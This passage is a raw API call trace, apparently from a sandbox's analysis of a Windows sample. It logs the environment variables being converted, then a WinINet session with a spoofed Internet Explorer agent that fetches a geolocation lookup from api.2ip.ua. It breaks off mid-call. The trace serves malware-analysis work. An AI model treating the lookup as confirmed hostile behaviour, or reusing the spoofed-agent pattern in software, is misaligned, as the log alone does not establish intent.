lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0071.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x17) returned 0x650aa8 [0071.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x650aa8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0071.713] GetLastError () returned 0x0 [0071.713] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650b00) returned 0x34 [0071.713] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650b00, Size=0x38) returned 0x650b00 [0071.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0071.713] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xe) returned 0x64e8e8 [0071.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x64e8e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0071.713] GetLastError () returned 0x0 [0071.714] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650b00) returned 0x38 [0071.714] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650b00, Size=0x3c) returned 0x650b00 [0071.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0071.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x69) returned 0x650b48 [0071.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x650b48, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0071.714] GetLastError () returned 0x0 [0071.714] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650b00) returned 0x3c [0071.714] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650b00, Size=0x40) returned 0x650b00 [0071.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0071.714] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3e) returned 0x645170 [0071.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x645170, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0071.714] GetLastError () returned 0x0 [0071.714] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650b00) returned 0x40 [0071.714] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650b00, Size=0x44) returned 0x650bc0 [0071.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0071.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1b) returned 0x64f2c0 [0071.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x64f2c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0071.715] GetLastError () returned 0x0 [0071.715] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650bc0) returned 0x44 [0071.715] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650bc0, Size=0x48) returned 0x650bc0 [0071.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0071.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1d) returned 0x64f2e8 [0071.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x64f2e8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0071.715] GetLastError () returned 0x0 [0071.715] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650bc0) returned 0x48 [0071.715] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650bc0, Size=0x4c) returned 0x650bc0 [0071.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0071.715] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x48) returned 0x646db8 [0071.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x646db8, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0071.715] GetLastError () returned 0x0 [0071.716] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650bc0) returned 0x4c [0071.716] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650bc0, Size=0x50) returned 0x650bc0 [0071.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0071.716] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x12) returned 0x650b00 [0071.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x650b00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0071.716] GetLastError () returned 0x0 [0071.716] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650bc0) returned 0x50 [0071.716] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650bc0, Size=0x54) returned 0x650bc0 [0071.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0071.716] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x18) returned 0x650b20 [0071.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x650b20, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0071.716] GetLastError () returned 0x0 [0071.716] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650bc0) returned 0x54 [0071.716] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650bc0, Size=0x58) returned 0x650bc0 [0071.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0071.716] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1b) returned 0x64f310 [0071.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x64f310, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0071.716] GetLastError () returned 0x0 [0071.717] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650bc0) returned 0x58 [0071.717] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650bc0, Size=0x5c) returned 0x650bc0 [0071.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0071.717] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x24) returned 0x64ac10 [0071.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x64ac10, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0071.717] GetLastError () returned 0x0 [0071.717] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650bc0) returned 0x5c [0071.717] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650bc0, Size=0x60) returned 0x650bc0 [0071.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0071.717] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x29) returned 0x64b2f0 [0071.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x64b2f0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0071.717] GetLastError () returned 0x0 [0071.717] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650bc0) returned 0x60 [0071.717] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650bc0, Size=0x64) returned 0x650bc0 [0071.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0071.717] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1e) returned 0x64f338 [0071.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x64f338, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0071.718] GetLastError () returned 0x0 [0071.718] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650bc0) returned 0x64 [0071.718] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650bc0, Size=0x68) returned 0x650bc0 [0071.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0071.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x41) returned 0x646e08 [0071.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x646e08, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0071.718] GetLastError () returned 0x0 [0071.718] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650bc0) returned 0x68 [0071.718] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650bc0, Size=0x6c) returned 0x650bc0 [0071.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0071.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x17) returned 0x650c38 [0071.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x650c38, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0071.718] GetLastError () returned 0x0 [0071.718] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650bc0) returned 0x6c [0071.718] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650bc0, Size=0x70) returned 0x650bc0 [0071.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0071.718] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0xf) returned 0x64e900 [0071.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x64e900, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0071.718] GetLastError () returned 0x0 [0071.719] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650bc0) returned 0x70 [0071.719] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650bc0, Size=0x74) returned 0x650c58 [0071.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0071.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x16) returned 0x650bc0 [0071.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x650bc0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0071.719] GetLastError () returned 0x0 [0071.719] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650c58) returned 0x74 [0071.719] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650c58, Size=0x78) returned 0x650c58 [0071.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0071.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2a) returned 0x64b328 [0071.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x64b328, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0071.719] GetLastError () returned 0x0 [0071.719] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650c58) returned 0x78 [0071.719] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650c58, Size=0x7c) returned 0x650c58 [0071.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0071.719] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x29) returned 0x64b360 [0071.719] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x64b360, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0071.719] GetLastError () returned 0x0 [0071.720] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650c58) returned 0x7c [0071.720] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650c58, Size=0x80) returned 0x650c58 [0071.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0071.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x15) returned 0x650be0 [0071.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x650be0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0071.720] GetLastError () returned 0x0 [0071.720] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650c58) returned 0x80 [0071.720] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650c58, Size=0x84) returned 0x650c58 [0071.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0071.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1e) returned 0x64f360 [0071.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x64f360, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0071.720] GetLastError () returned 0x0 [0071.720] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650c58) returned 0x84 [0071.720] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650c58, Size=0x88) returned 0x650c58 [0071.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0071.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2a) returned 0x64b398 [0071.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x64b398, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0071.720] GetLastError () returned 0x0 [0071.720] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650c58) returned 0x88 [0071.720] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650c58, Size=0x8c) returned 0x650c58 [0071.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0071.720] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x12) returned 0x650c00 [0071.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x650c00, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0071.721] GetLastError () returned 0x0 [0071.721] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650c58) returned 0x8c [0071.721] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650c58, Size=0x90) returned 0x650c58 [0071.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0071.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x18) returned 0x650cf0 [0071.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x650cf0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0071.721] GetLastError () returned 0x0 [0071.721] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650c58) returned 0x90 [0071.721] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650c58, Size=0x94) returned 0x650d10 [0071.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0071.721] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x46) returned 0x646e58 [0071.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x646e58, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0071.721] GetLastError () returned 0x0 [0071.722] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x650d10) returned 0x94 [0071.722] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x650d10, Size=0x98) returned 0x650d10 [0071.722] GetLastError () returned 0x0 [0071.760] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651e68) returned 0x80 [0071.760] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651e68) returned 0x80 [0071.760] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651e68) returned 0x80 [0071.766] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8ec) returned 0x651fd8 [0071.799] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651e68) returned 0x80 [0071.800] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x64e918 [0071.800] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651e68) returned 0x80 [0071.800] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651e68) returned 0x80 [0071.800] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651e68) returned 0x80 [0071.841] RtlSizeHeap (HeapHandle=0x630000, Flags=0x0, MemoryPointer=0x651e68) returned 0x80 [0071.849] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0071.998] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x6454d0 [0071.998] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0072.877] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18b638, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18de38 | out: 